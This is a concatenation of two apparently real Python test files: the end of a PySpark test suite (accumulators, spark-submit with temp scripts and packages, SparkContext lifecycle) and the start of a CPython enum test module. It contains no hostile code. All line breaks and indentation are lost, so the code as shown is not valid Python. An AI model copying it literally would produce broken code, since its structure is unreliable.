self.sc.parallelize(range(100), 20).foreach(lambda x: acc1.add(x)) self.assertEqual(sum(range(100)), acc1.value) acc2 = self.sc.accumulator(0, INT_ACCUMULATOR_PARAM) self.sc.parallelize(range(100), 20).foreach(lambda x: acc2.add(x)) self.assertEqual(sum(range(100)), acc2.value) self.assertEqual(sum(range(100)), acc1.value) def test_reuse_worker_after_take(self): rdd = self.sc.parallelize(range(100000), 1) self.assertEqual(0, rdd.first()) def count(): try: rdd.count() except Exception: pass t = threading.Thread(target=count) t.daemon = True t.start() t.join(5) self.assertTrue(not t.isAlive()) self.assertEqual(100000, rdd.count()) def test_with_different_versions_of_python(self): rdd = self.sc.parallelize(range(10)) rdd.count() version = self.sc.pythonVer self.sc.pythonVer = "2.0" try: with QuietTest(self.sc): self.assertRaises(Py4JJavaError, lambda: rdd.count()) finally: self.sc.pythonVer = version class SparkSubmitTests(unittest.TestCase): def setUp(self): self.programDir = tempfile.mkdtemp() self.sparkSubmit = os.path.join(os.environ.get("SPARK_HOME"), "bin", "spark-submit") def tearDown(self): shutil.rmtree(self.programDir) def createTempFile(self, name, content, dir=None): """ Create a temp file with the given name and content and return its path. Strips leading spaces from content up to the first '|' in each line. """ pattern = re.compile(r'^ *\|', re.MULTILINE) content = re.sub(pattern, '', content.strip()) if dir is None: path = os.path.join(self.programDir, name) else: os.makedirs(os.path.join(self.programDir, dir)) path = os.path.join(self.programDir, dir, name) with open(path, "w") as f: f.write(content) return path def createFileInZip(self, name, content, ext=".zip", dir=None, zip_name=None): """ Create a zip archive containing a file with the given content and return its path. Strips leading spaces from content up to the first '|' in each line. """ pattern = re.compile(r'^ *\|', re.MULTILINE) content = re.sub(pattern, '', content.strip()) if dir is None: path = os.path.join(self.programDir, name + ext) else: path = os.path.join(self.programDir, dir, zip_name + ext) zip = zipfile.ZipFile(path, 'w') zip.writestr(name, content) zip.close() return path def create_spark_package(self, artifact_name): group_id, artifact_id, version = artifact_name.split(":") self.createTempFile("%s-%s.pom" % (artifact_id, version), (""" |<?xml version="1.0" encoding="UTF-8"?> |<project xmlns="http://maven.apache.org/POM/4.0.0" | xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" | xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 | http://maven.apache.org/xsd/maven-4.0.0.xsd"> | <modelVersion>4.0.0</modelVersion> | <groupId>%s</groupId> | <artifactId>%s</artifactId> | <version>%s</version> |</project> """ % (group_id, artifact_id, version)).lstrip(), os.path.join(group_id, artifact_id, version)) self.createFileInZip("%s.py" % artifact_id, """ |def myfunc(x): | return x + 1 """, ".jar", os.path.join(group_id, artifact_id, version), "%s-%s" % (artifact_id, version)) def test_single_script(self): """Submit and test a single script file""" script = self.createTempFile("test.py", """ |from pyspark import SparkContext | |sc = SparkContext() |print(sc.parallelize([1, 2, 3]).map(lambda x: x * 2).collect()) """) proc = subprocess.Popen([self.sparkSubmit, script], stdout=subprocess.PIPE) out, err = proc.communicate() self.assertEqual(0, proc.returncode) self.assertIn("[2, 4, 6]", out.decode('utf-8')) def test_script_with_local_functions(self): """Submit and test a single script file calling a global function""" script = self.createTempFile("test.py", """ |from pyspark import SparkContext | |def foo(x): | return x * 3 | |sc = SparkContext() |print(sc.parallelize([1, 2, 3]).map(foo).collect()) """) proc = subprocess.Popen([self.sparkSubmit, script], stdout=subprocess.PIPE) out, err = proc.communicate() self.assertEqual(0, proc.returncode) self.assertIn("[3, 6, 9]", out.decode('utf-8')) def test_module_dependency(self): """Submit and test a script with a dependency on another module""" script = self.createTempFile("test.py", """ |from pyspark import SparkContext |from mylib import myfunc | |sc = SparkContext() |print(sc.parallelize([1, 2, 3]).map(myfunc).collect()) """) zip = self.createFileInZip("mylib.py", """ |def myfunc(x): | return x + 1 """) proc = subprocess.Popen([self.sparkSubmit, "--py-files", zip, script], stdout=subprocess.PIPE) out, err = proc.communicate() self.assertEqual(0, proc.returncode) self.assertIn("[2, 3, 4]", out.decode('utf-8')) def test_module_dependency_on_cluster(self): """Submit and test a script with a dependency on another module on a cluster""" script = self.createTempFile("test.py", """ |from pyspark import SparkContext |from mylib import myfunc | |sc = SparkContext() |print(sc.parallelize([1, 2, 3]).map(myfunc).collect()) """) zip = self.createFileInZip("mylib.py", """ |def myfunc(x): | return x + 1 """) proc = subprocess.Popen([self.sparkSubmit, "--py-files", zip, "--master", "local-cluster[1,1,512]", script], stdout=subprocess.PIPE) out, err = proc.communicate() self.assertEqual(0, proc.returncode) self.assertIn("[2, 3, 4]", out.decode('utf-8')) def test_package_dependency(self): """Submit and test a script with a dependency on a Spark Package""" script = self.createTempFile("test.py", """ |from pyspark import SparkContext |from mylib import myfunc | |sc = SparkContext() |print(sc.parallelize([1, 2, 3]).map(myfunc).collect()) """) self.create_spark_package("a:mylib:0.1") proc = subprocess.Popen([self.sparkSubmit, "--packages", "a:mylib:0.1", "--repositories", "file:" + self.programDir, script], stdout=subprocess.PIPE) out, err = proc.communicate() self.assertEqual(0, proc.returncode) self.assertIn("[2, 3, 4]", out.decode('utf-8')) def test_package_dependency_on_cluster(self): """Submit and test a script with a dependency on a Spark Package on a cluster""" script = self.createTempFile("test.py", """ |from pyspark import SparkContext |from mylib import myfunc | |sc = SparkContext() |print(sc.parallelize([1, 2, 3]).map(myfunc).collect()) """) self.create_spark_package("a:mylib:0.1") proc = subprocess.Popen([self.sparkSubmit, "--packages", "a:mylib:0.1", "--repositories", "file:" + self.programDir, "--master", "local-cluster[1,1,512]", script], stdout=subprocess.PIPE) out, err = proc.communicate() self.assertEqual(0, proc.returncode) self.assertIn("[2, 3, 4]", out.decode('utf-8')) def test_single_script_on_cluster(self): """Submit and test a single script on a cluster""" script = self.createTempFile("test.py", """ |from pyspark import SparkContext | |def foo(x): | return x * 2 | |sc = SparkContext() |print(sc.parallelize([1, 2, 3]).map(foo).collect()) """) # this will fail if you have different spark.executor.memory # in conf/spark-defaults.conf proc = subprocess.Popen( [self.sparkSubmit, "--master", "local-cluster[1,1,512]", script], stdout=subprocess.PIPE) out, err = proc.communicate() self.assertEqual(0, proc.returncode) self.assertIn("[2, 4, 6]", out.decode('utf-8')) class ContextTests(unittest.TestCase): def test_failed_sparkcontext_creation(self): # Regression test for SPARK-1550 self.assertRaises(Exception, lambda: SparkContext("an-invalid-master-name")) def test_stop(self): sc = SparkContext() self.assertNotEqual(SparkContext._active_spark_context, None) sc.stop() self.assertEqual(SparkContext._active_spark_context, None) def test_with(self): with SparkContext() as sc: self.assertNotEqual(SparkContext._active_spark_context, None) self.assertEqual(SparkContext._active_spark_context, None) def test_with_exception(self): try: with SparkContext() as sc: self.assertNotEqual(SparkContext._active_spark_context, None) raise Exception() except: pass self.assertEqual(SparkContext._active_spark_context, None) def test_with_stop(self): with SparkContext() as sc: self.assertNotEqual(SparkContext._active_spark_context, None) sc.stop() self.assertEqual(SparkContext._active_spark_context, None) def test_progress_api(self): with SparkContext() as sc: sc.setJobGroup('test_progress_api', '', True) rdd = sc.parallelize(range(10)).map(lambda x: time.sleep(100)) def run(): try: rdd.count() except Exception: pass t = threading.Thread(target=run) t.daemon = True t.start() # wait for scheduler to start time.sleep(1) tracker = sc.statusTracker() jobIds = tracker.getJobIdsForGroup('test_progress_api') self.assertEqual(1, len(jobIds)) job = tracker.getJobInfo(jobIds[0]) self.assertEqual(1, len(job.stageIds)) stage = tracker.getStageInfo(job.stageIds[0]) self.assertEqual(rdd.getNumPartitions(), stage.numTasks) sc.cancelAllJobs() t.join() # wait for event listener to update the status time.sleep(1) job = tracker.getJobInfo(jobIds[0]) self.assertEqual('FAILED', job.status) self.assertEqual([], tracker.getActiveJobsIds()) self.assertEqual([], tracker.getActiveStageIds()) sc.stop() @unittest.skipIf(not _have_scipy, "SciPy not installed") class SciPyTests(PySparkTestCase): """General PySpark tests that depend on scipy """ def test_serialize(self): from scipy.special import gammaln x = range(1, 5) expected = list(map(gammaln, x)) observed = self.sc.parallelize(x).map(gammaln).collect() self.assertEqual(expected, observed) @unittest.skipIf(not _have_numpy, "NumPy not installed") class NumPyTests(PySparkTestCase): """General PySpark tests that depend on numpy """ def test_statcounter_array(self): x = self.sc.parallelize([np.array([1.0, 1.0]), np.array([2.0, 2.0]), np.array([3.0, 3.0])]) s = x.stats() self.assertSequenceEqual([2.0, 2.0], s.mean().tolist()) self.assertSequenceEqual([1.0, 1.0], s.min().tolist()) self.assertSequenceEqual([3.0, 3.0], s.max().tolist()) self.assertSequenceEqual([1.0, 1.0], s.sampleStdev().tolist()) if __name__ == "__main__": if not _have_scipy: print("NOTE: Skipping SciPy tests as it does not seem to be installed") if not _have_numpy: print("NOTE: Skipping NumPy tests as it does not seem to be installed") unittest.main() if not _have_scipy: print("NOTE: SciPy tests were skipped as it does not seem to be installed") if not _have_numpy: print("NOTE: NumPy tests were skipped as it does not seem to be installed")
test_enum.py
import enum import doctest import inspect import os import pydoc import sys import unittest import threading from collections import OrderedDict from enum import Enum, IntEnum, StrEnum, EnumType, Flag, IntFlag, unique, auto from enum import STRICT, CONFORM, EJECT, KEEP, _simple_enum, _test_simple_enum from enum import verify, UNIQUE, CONTINUOUS, NAMED_FLAGS from io import StringIO from pickle import dumps, loads, PicklingError, HIGHEST_PROTOCOL from test import support from test.support import ALWAYS_EQ from test.support import threading_helper from datetime import timedelta python_version = sys.version_info[:2] def load_tests(loader, tests, ignore): tests.addTests(doctest.DocTestSuite(enum)) if os.path.exists('Doc/library/enum.rst'): tests.addTests(doctest.DocFileSuite( '../../Doc/library/enum.rst', optionflags=doctest.ELLIPSIS|doctest.NORMALIZE_WHITESPACE, )) return tests MODULE = ('test.test_enum', '__main__')[__name__=='__main__'] SHORT_MODULE = MODULE.split('.')[-1] # for pickle tests try: class Stooges(Enum): LARRY = 1 CURLY = 2 MOE = 3 except Exception as exc: Stooges = exc try: class IntStooges(int, Enum): LARRY = 1 CURLY = 2 MOE = 3 except Exception as exc: IntStooges = exc try: class FloatStooges(float, Enum): LARRY = 1.39 CURLY = 2.72 MOE = 3.142596 except Exception as exc: FloatStooges = exc try: class FlagStooges(Flag): LARRY = 1 CURLY = 2 MOE = 3 except Exception as exc: FlagStooges = exc # for pickle test and subclass tests class Name(StrEnum): BDFL = 'Guido van Rossum' FLUFL = 'Barry Warsaw' try: Question = Enum('Question', 'who what when where why', module=__name__) except Exception as exc: Question = exc try: Answer = Enum('Answer', 'him this then there because') except Exception as exc: Answer = exc try: Theory = Enum('Theory', 'rule law supposition', qualname='spanish_inquisition') except Exception as exc: Theory = exc # for doctests try: class Fruit(Enum): TOMATO = 1 BANANA = 2 CHERRY = 3 except Exception: pass def test_pickle_dump_load(assertion, source, target=None): if target is None: target = source for protocol in range(HIGHEST_PROTOCOL + 1): assertion(loads(dumps(source, protocol=protocol)), target) def test_pickle_exception(assertion, exception, obj): for protocol in range(HIGHEST_PROTOCOL + 1): with assertion(exception): dumps(obj, protocol=protocol) class TestHelpers(unittest.TestCase): # _is_descriptor, _is_sunder, _is_dunder def test_is_descriptor(self): class foo: pass for attr in ('__get__','__set__','__delete__'): obj = foo() self.assertFalse(enum._is_descriptor(obj)) setattr(obj, attr, 1) self.assertTrue(enum._is_descriptor(obj)) def test_is_sunder(self): for s in ('_a_', '_aa_'): self.assertTrue(enum._is_sunder(s)) for s in ('a', 'a_', '_a', '__a', 'a__', '__a__', '_a__', '__a_', '_', '__', '___', '____', '_____',): self.assertFalse(enum._is_sunder(s)) def test_is_dunder(self): for s in ('__a__', '__aa__'): self.assertTrue(enum._is_dunder(s)) for s in ('a', 'a_', '_a', '__a', 'a__', '_a_', '_a__', '__a_', '_', '__', '___', '____', '_____',): self.assertFalse(enum._is_dunder(s)) # for subclassing tests class classproperty: def __init__(self, fget=None, fset=None, fdel=None, doc=None): self.fget = fget self.fset = fset self.fdel = fdel if doc is None and fget is not None: doc = fget.__doc__ self.__doc__ = doc def __get__(self, instance, ownerclass): return self.fget(ownerclass) # for global repr tests @enum.global_enum class HeadlightsK(IntFlag, boundary=enum.KEEP): OFF_K = 0 LOW_BEAM_K = auto() HIGH_BEAM_K = auto() FOG_K = auto() @enum.global_enum class HeadlightsC(IntFlag, boundary=enum.CONFORM): OFF_C = 0 LOW_BEAM_C = auto() HIGH_BEAM_C = auto() FOG_C = auto() # tests class TestEnum(unittest.TestCase): def setUp(self): class Season(Enum): SPRING = 1 SUMMER = 2 AUTUMN = 3 WINTER = 4 self.Season = Season class Konstants(float, Enum): E = 2.7182818 PI = 3.1415926 TAU = 2 * PI self.Konstants = Konstants class Grades(IntEnum): A = 5 B = 4 C = 3 D = 2 F = 0 self.Grades = Grades class Directional(str, Enum): EAST = 'east' WEST = 'west' NORTH = 'north' SOUTH = 'south' self.Directional = Directional from datetime import date class Holiday(date, Enum): NEW_YEAR = 2013, 1, 1 IDES_OF_MARCH = 2013, 3, 15 self.Holiday = Holiday class DateEnum(date, Enum): pass self.DateEnum = DateEnum class FloatEnum(float, Enum): pass self.FloatEnum = FloatEnum class Wowser(Enum): this = 'that' these = 'those' def wowser(self): """Wowser docstring""" return ("Wowser! I'm %s!" % self.name) @classmethod def classmethod_wowser(cls): pass @staticmethod def staticmethod_wowser(): pass self.Wowser = Wowser class IntWowser(IntEnum): this = 1 these = 2 def wowser(self): """Wowser docstring""" return ("Wowser! I'm %s!" % self.name) @classmethod def classmethod_wowser(cls): pass @staticmethod def staticmethod_wowser(): pass self.IntWowser = IntWowser class FloatWowser(float, Enum): this = 3.14 these = 4.2 def wowser(self): """Wowser docstring""" return ("Wowser! I'm %s!" % self.name) @classmethod def classmethod_wowser(cls): pass @staticmethod def staticmethod_wowser(): pass self.FloatWowser = FloatWowser class WowserNoMembers(Enum): def wowser(self): pass @classmethod def classmethod_wowser(cls): pass @staticmethod def staticmethod_wowser(): pass class SubclassOfWowserNoMembers(WowserNoMembers): pass self.WowserNoMembers = WowserNoMembers self.SubclassOfWowserNoMembers = SubclassOfWowserNoMembers class IntWowserNoMembers(IntEnum): def wowser(self): pass @classmethod def classmethod_wowser(cls): pass @staticmethod def staticmethod_wowser(): pass self.IntWowserNoMembers = IntWowserNoMembers class FloatWowserNoMembers(float, Enum): def wowser(self): pass @classmethod def classmethod_wowser(cls): pass @staticmethod def staticmethod_wowser(): pass self.FloatWowserNoMembers = FloatWowserNoMembers class EnumWithInit(Enum): def __init__(self, greeting, farewell): self.greeting = greeting self.farewell = farewell ENGLISH = 'hello', 'goodbye' GERMAN = 'Guten Morgen', 'Auf Wiedersehen' def some_method(self): pass self.EnumWithInit = EnumWithInit # see issue22506 class SuperEnum1(Enum): def invisible(self): return "did you see me?" class SubEnum1(SuperEnum1): sample = 5 self.SubEnum1 = SubEnum1 class SuperEnum2(IntEnum): def __new__(cls, value, description=""): obj = int.__new__(cls, value) obj._value_ = value obj.description = description return obj class SubEnum2(SuperEnum2): sample = 5 self.SubEnum2 = SubEnum2 def test_dir_basics_for_all_enums(self): enums_for_tests = ( # Generic enums in enum.py Enum, IntEnum, StrEnum, # Generic enums defined outside of enum.py self.DateEnum, self.FloatEnum, # Concrete enums derived from enum.py generics self.Grades, self.Season, # Concrete enums derived from generics defined outside of enum.py self.Konstants, self.Holiday, # Standard enum with added behaviour & members self.Wowser, # Mixin-enum-from-enum.py with added behaviour & members self.IntWowser, # Mixin-enum-from-oustide-enum.py with added behaviour & members self.FloatWowser, # Equivalents of the three immediately above, but with no members self.WowserNoMembers, self.IntWowserNoMembers, self.FloatWowserNoMembers, # Enum with members and an __init__ method self.EnumWithInit, # Special cases to test self.SubEnum1, self.SubEnum2 ) for cls in enums_for_tests: with self.subTest(cls=cls): cls_dir = dir(cls) # test that dir is deterministic self.assertEqual(cls_dir, dir(cls)) # test that dir is sorted self.assertEqual(list(cls_dir), sorted(cls_dir)) # test that there are no dupes in dir self.assertEqual(len(cls_dir), len(set(cls_dir))) # test that there are no sunders in dir self.assertFalse(any(enum._is_sunder(attr) for attr in cls_dir)) self.assertNotIn('__new__', cls_dir) for attr in ('__class__', '__doc__', '__members__', '__module__'): with self.subTest(attr=attr): self.assertIn(attr, cls_dir) def test_dir_for_enum_with_members(self): enums_for_test = ( # Enum with members self.Season, # IntEnum with members self.Grades, # Two custom-mixin enums with members self.Konstants, self.Holiday, # several enums-with-added-behaviour and members self.Wowser, self.IntWowser, self.FloatWowser, # An enum with an __init__ method and members self.EnumWithInit, # Special cases to test self.SubEnum1, self.SubEnum2 ) for cls in enums_for_test: cls_dir = dir(cls) member_names = cls._member_names_ with self.subTest(cls=cls): self.assertTrue(all(member_name in cls_dir for member_name in member_names)) for member in cls: member_dir = dir(member) # test that dir is deterministic self.assertEqual(member_dir, dir(member)) # test that dir is sorted self.assertEqual(list(member_dir), sorted(member_dir)) # test that there are no dupes in dir self.assertEqual(len(member_dir), len(set(member_dir))) for attr_name in cls_dir: with self.subTest(attr_name=attr_name): if attr_name in {'__members__', '__init__', '__new__', *member_names}: self.assertNotIn(attr_name, member_dir) else: self.assertIn(attr_name, member_dir) self.assertFalse(any(enum._is_sunder(attr) for attr in member_dir)) def test_dir_for_enums_with_added_behaviour(self): enums_for_test = ( self.Wowser, self.IntWowser, self.FloatWowser, self.WowserNoMembers, self.SubclassOfWowserNoMembers, self.IntWowserNoMembers, self.FloatWowserNoMembers ) for cls in enums_for_test: with self.subTest(cls=cls): self.assertIn('wowser', dir(cls)) self.assertIn('classmethod_wowser', dir(cls)) self.assertIn('staticmethod_wowser', dir(cls)) self.assertTrue(all( all(attr in dir(member) for attr in ('wowser', 'classmethod_wowser', 'staticmethod_wowser')) for member in cls )) self.assertEqual(dir(self.WowserNoMembers), dir(self.SubclassOfWowserNoMembers)) # Check classmethods are present self.assertIn('from_bytes', dir(self.IntWowser)) self.assertIn('from_bytes', dir(self.IntWowserNoMembers)) def test_help_output_on_enum_members(self): added_behaviour_enums = ( self.Wowser, self.IntWowser, self.FloatWowser ) for cls in added_behaviour_enums: with self.subTest(cls=cls): rendered_doc = pydoc.render_doc(cls.this) self.assertIn('Wowser docstring', rendered_doc) if cls in {self.IntWowser, self.FloatWowser}: self.assertIn('float(self)', rendered_doc) def test_dir_for_enum_with_init(self): EnumWithInit = self.EnumWithInit cls_dir = dir(EnumWithInit) self.assertIn('__init__', cls_dir) self.assertIn('some_method', cls_dir) self.assertNotIn('greeting', cls_dir) self.assertNotIn('farewell', cls_dir) member_dir = dir(EnumWithInit.ENGLISH) self.assertNotIn('__init__', member_dir) self.assertIn('some_method', member_dir) self.assertIn('greeting', member_dir) self.assertIn('farewell', member_dir) def test_mixin_dirs(self): from datetime import date enums_for_test = ( # generic mixins from enum.py (IntEnum, int), (StrEnum, str), # generic mixins from outside enum.py (self.FloatEnum, float), (self.DateEnum, date), # concrete mixin from enum.py (self.Grades, int), # concrete mixin from outside enum.py (self.Holiday, date), # concrete mixin from enum.py with added behaviour (self.IntWowser, int), # concrete mixin from outside enum.py with added behaviour (self.FloatWowser, float) ) enum_dict = Enum.__dict__ enum_dir = dir(Enum) enum_module_names = enum.__all__ is_from_enum_module = lambda cls: cls.__name__ in enum_module_names is_enum_dunder = lambda attr: enum._is_dunder(attr) and attr in enum_dict def attr_is_inherited_from_object(cls, attr_name): for base in cls.__mro__: if attr_name in base.__dict__: return base is object return False # General tests for enum_cls, mixin_cls in enums_for_test: with self.subTest(enum_cls=enum_cls): cls_dir = dir(enum_cls) cls_dict = enum_cls.__dict__ mixin_attrs = [ x for x in dir(mixin_cls) if not attr_is_inherited_from_object(cls=mixin_cls, attr_name=x) ] first_enum_base = next( base for base in enum_cls.__mro__ if is_from_enum_module(base) ) for attr in mixin_attrs: with self.subTest(attr=attr): if enum._is_sunder(attr): # Unlikely, but no harm in testing self.assertNotIn(attr, cls_dir) elif attr in {'__class__', '__doc__', '__members__', '__module__'}: self.assertIn(attr, cls_dir) elif is_enum_dunder(attr): if is_from_enum_module(enum_cls): self.assertNotIn(attr, cls_dir) elif getattr(enum_cls, attr) is getattr(first_enum_base, attr): self.assertNotIn(attr, cls_dir) else: self.assertIn(attr, cls_dir) else: self.assertIn(attr, cls_dir) # Some specific examples int_enum_dir = dir(IntEnum) self.assertIn('imag', int_enum_dir) self.assertIn('__rfloordiv__', int_enum_dir) self.assertNotIn('__format__', int_enum_dir) self.assertNotIn('__hash__', int_enum_dir) self.assertNotIn('__init_subclass__', int_enum_dir) self.assertNotIn('__subclasshook__', int_enum_dir) class OverridesFormatOutsideEnumModule(Enum): def __format__(self, *args, **kwargs): return super().__format__(*args, **kwargs) SOME_MEMBER = 1 self.assertIn('__format__', dir(OverridesFormatOutsideEnumModule)) self.assertIn('__format__', dir(OverridesFormatOutsideEnumModule.SOME_MEMBER)) def test_dir_on_sub_with_behavior_on_super(self): # see issue22506 self.assertEqual( set(dir(self.SubEnum1.sample)), set(['__class__', '__doc__', '__module__', 'name', 'value', 'invisible']), ) def test_dir_on_sub_with_behavior_including_instance_dict_on_super(self): # see issue40084 self.assertTrue({'description'} <= set(dir(self.SubEnum2.sample))) def test_enum_in_enum_out(self): Season = self.Season self.assertIs(Season(Season.WINTER), Season.WINTER) def test_enum_value(self): Season = self.Season self.assertEqual(Season.SPRING.value, 1) def test_intenum_value(self): self.assertEqual(IntStooges.CURLY.value, 2) def test_enum(self): Season = self.Season lst = list(Season) self.assertEqual(len(lst), len(Season)) self.assertEqual(len(Season), 4, Season) self.assertEqual( [Season.SPRING, Season.SUMMER, Season.AUTUMN, Season.WINTER], lst) for i, season in enumerate('SPRING SUMMER AUTUMN WINTER'.split(), 1): e = Season(i) self.assertEqual(e, getattr(Season, season)) self.assertEqual(e.value, i) self.assertNotEqual(e, i) self.assertEqual(e.name, season) self.assertIn(e, Season) self.assertIs(type(e), Season) self.assertIsInstance(e, Season) self.assertEqual(str(e), season) self.assertEqual(repr(e), 'Season.{0}'.format(season)) def test_value_name(self): Season = self.Season self.assertEqual(Season.SPRING.name, 'SPRING') self.assertEqual(Season.SPRING.value, 1) with self.assertRaises(AttributeError): Season.SPRING.name = 'invierno' with self.assertRaises(AttributeError): Season.SPRING.value = 2 def test_changing_member(self): Season = self.Season with self.assertRaises(AttributeError): Season.WINTER = 'really cold' def test_attribute_deletion(self): class Season(Enum): SPRING = 1 SUMMER = 2 AUTUMN = 3 WINTER = 4 def spam(cls): pass self.assertTrue(hasattr(Season, 'spam')) del Season.spam self.assertFalse(hasattr(Season, 'spam')) with self.assertRaises(AttributeError): del Season.SPRING with self.assertRaises(AttributeError): del Season.DRY with self.assertRaises(AttributeError): del Season.SPRING.name def test_bool_of_class(self): class Empty(Enum): pass self.assertTrue(bool(Empty)) def test_bool_of_member(self): class Count(Enum): zero = 0 one = 1 two = 2 for member in Count: self.assertTrue(bool(member)) def test_invalid_names(self): with self.assertRaises(ValueError): class Wrong(Enum): mro = 9 with self.assertRaises(ValueError): class Wrong(Enum): _create_= 11 with self.assertRaises(ValueError): class Wrong(Enum): _get_mixins_ = 9 with self.assertRaises(ValueError): class Wrong(Enum): _find_new_ = 1 with self.assertRaises(ValueError): class Wrong(Enum): _any_name_ = 9 def test_bool(self): # plain Enum members are always True class Logic(Enum): true = True false = False self.assertTrue(Logic.true) self.assertTrue(Logic.false) # unless overridden class RealLogic(Enum): true = True false = False def __bool__(self): return bool(self._value_) self.assertTrue(RealLogic.true) self.assertFalse(RealLogic.false) # mixed Enums depend on mixed-in type class IntLogic(int, Enum): true = 1 false = 0 self.assertTrue(IntLogic.true) self.assertFalse(IntLogic.false) @unittest.skipIf( python_version >= (3, 12), '__contains__ now returns True/False for all inputs', ) def test_contains_er(self): Season = self.Season self.assertIn(Season.AUTUMN, Season) with self.assertRaises(TypeError): with self.assertWarns(DeprecationWarning): 3 in Season with self.assertRaises(TypeError): with self.assertWarns(DeprecationWarning): 'AUTUMN' in Season val = Season(3) self.assertIn(val, Season) # class OtherEnum(Enum): one = 1; two = 2 self.assertNotIn(OtherEnum.two, Season) @unittest.skipIf( python_version < (3, 12), '__contains__ only works with enum memmbers before 3.12', ) def test_contains_tf(self): Season = self.Season self.assertIn(Season.AUTUMN, Season) self.assertTrue(3 in Season) self.assertFalse('AUTUMN' in Season) val = Season(3) self.assertIn(val, Season) # class OtherEnum(Enum): one = 1; two = 2 self.assertNotIn(OtherEnum.two, Season) def test_comparisons(self): Season = self.Season with self.assertRaises(TypeError): Season.SPRING < Season.WINTER with self.assertRaises(TypeError): Season.SPRING > 4 self.assertNotEqual(Season.SPRING, 1) class Part(Enum): SPRING = 1 CLIP = 2 BARREL = 3 self.assertNotEqual(Season.SPRING, Part.SPRING) with self.assertRaises(TypeError): Season.SPRING < Part.CLIP def test_enum_duplicates(self): class Season(Enum): SPRING = 1 SUMMER = 2 AUTUMN = FALL = 3 WINTER = 4 ANOTHER_SPRING = 1 lst = list(Season) self.assertEqual( lst, [Season.SPRING, Season.SUMMER, Season.AUTUMN, Season.WINTER, ]) self.assertIs(Season.FALL, Season.AUTUMN) self.assertEqual(Season.FALL.value, 3) self.assertEqual(Season.AUTUMN.value, 3) self.assertIs(Season(3), Season.AUTUMN) self.assertIs(Season(1), Season.SPRING) self.assertEqual(Season.FALL.name, 'AUTUMN') self.assertEqual( [k for k,v in Season.__members__.items() if v.name != k], ['FALL', 'ANOTHER_SPRING'], ) def test_duplicate_name(self): with self.assertRaises(TypeError): class Color(Enum): red = 1 green = 2 blue = 3 red = 4 with self.assertRaises(TypeError): class Color(Enum): red = 1 green = 2 blue = 3 def red(self): return 'red' with self.assertRaises(TypeError): class Color(Enum): @property def red(self): return 'redder' red = 1 green = 2 blue = 3 def test_reserved__sunder_(self): with self.assertRaisesRegex( ValueError, '_sunder_ names, such as ._bad_., are reserved', ): class Bad(Enum): _bad_ = 1 def test_enum_with_value_name(self): class Huh(Enum): name = 1 value = 2 self.assertEqual( list(Huh), [Huh.name, Huh.value], ) self.assertIs(type(Huh.name), Huh) self.assertEqual(Huh.name.name, 'name') self.assertEqual(Huh.name.value, 1) def test_format_enum(self): Season = self.Season self.assertEqual('{}'.format(Season.SPRING), '{}'.format(str(Season.SPRING))) self.assertEqual( '{:}'.format(Season.SPRING), '{:}'.format(str(Season.SPRING))) self.assertEqual('{:20}'.format(Season.SPRING), '{:20}'.format(str(Season.SPRING))) self.assertEqual('{:^20}'.format(Season.SPRING), '{:^20}'.format(str(Season.SPRING))) self.assertEqual('{:>20}'.format(Season.SPRING), '{:>20}'.format(str(Season.SPRING))) self.assertEqual('{:<20}'.format(Season.SPRING), '{:<20}'.format(str(Season.SPRING))) def test_str_override_enum(self): class EnumWithStrOverrides(Enum): one = auto() two = auto() def __str__(self): return 'Str!' self.assertEqual(str(EnumWithStrOverrides.one), 'Str!') self.assertEqual('{}'.format(EnumWithStrOverrides.one), 'Str!') def test_format_override_enum(self): class EnumWithFormatOverride(Enum): one = 1.0 two = 2.0 def __format__(self, spec): return 'Format!!' self.assertEqual(str(EnumWithFormatOverride.one), 'one') self.assertEqual('{}'.format(EnumWithFormatOverride.one), 'Format!!') def test_str_and_format_override_enum(self): class EnumWithStrFormatOverrides(Enum): one = auto() two = auto() def __str__(self): return 'Str!' def __format__(self, spec): return 'Format!' self.assertEqual(str(EnumWithStrFormatOverrides.one), 'Str!') self.assertEqual('{}'.format(EnumWithStrFormatOverrides.one), 'Format!') def test_str_override_mixin(self): class MixinEnumWithStrOverride(float, Enum): one = 1.0 two = 2.0 def __str__(self): return 'Overridden!' self.assertEqual(str(MixinEnumWithStrOverride.one), 'Overridden!') self.assertEqual('{}'.format(MixinEnumWithStrOverride.one), 'Overridden!') def test_str_and_format_override_mixin(self): class MixinWithStrFormatOverrides(float, Enum): one = 1.0 two = 2.0 def __str__(self): return 'Str!' def __format__(self, spec): return 'Format!' self.assertEqual(str(MixinWithStrFormatOverrides.one), 'Str!') self.assertEqual('{}'.format(MixinWithStrFormatOverrides.one), 'Format!') def test_format_override_mixin(self): class TestFloat(float, Enum): one = 1.0 two = 2.0 def __format__(self, spec): return 'TestFloat success!' self.assertEqual(str(TestFloat.one), 'one') self.assertEqual('{}'.format(TestFloat.one), 'TestFloat success!') @unittest.skipIf( python_version < (3, 12), 'mixin-format is still using member.value', ) def test_mixin_format_warning(self): class Grades(int, Enum): A = 5 B = 4 C = 3 D = 2 F = 0 self.assertEqual(f'{self.Grades.B}', 'B') @unittest.skipIf( python_version >= (3, 12), 'mixin-format now uses member instead of member.value', ) def test_mixin_format_warning(self): class Grades(int, Enum): A = 5 B = 4 C = 3 D = 2 F = 0 with self.assertWarns(DeprecationWarning): self.assertEqual(f'{Grades.B}', '4') def assertFormatIsValue(self, spec, member): if python_version < (3, 12) and (not spec or spec in ('{}','{:}')): with self.assertWarns(DeprecationWarning): self.assertEqual(spec.format(member), spec.format(member.value)) else: self.assertEqual(spec.format(member), spec.format(member.value)) def test_format_enum_date(self): Holiday = self.Holiday self.assertFormatIsValue('{}', Holiday.IDES_OF_MARCH) self.assertFormatIsValue('{:}', Holiday.IDES_OF_MARCH) self.assertFormatIsValue('{:20}', Holiday.IDES_OF_MARCH) self.assertFormatIsValue('{:^20}', Holiday.IDES_OF_MARCH) self.assertFormatIsValue('{:>20}', Holiday.IDES_OF_MARCH) self.assertFormatIsValue('{:<20}', Holiday.IDES_OF_MARCH) self.assertFormatIsValue('{:%Y %m}', Holiday.IDES_OF_MARCH) self.assertFormatIsValue('{:%Y %m %M:00}', Holiday.IDES_OF_MARCH) def test_format_enum_float(self): Konstants = self.Konstants self.assertFormatIsValue('{}', Konstants.TAU) self.assertFormatIsValue('{:}', Konstants.TAU) self.assertFormatIsValue('{:20}', Konstants.TAU) self.assertFormatIsValue('{:^20}', Konstants.TAU) self.assertFormatIsValue('{:>20}', Konstants.TAU) self.assertFormatIsValue('{:<20}', Konstants.TAU) 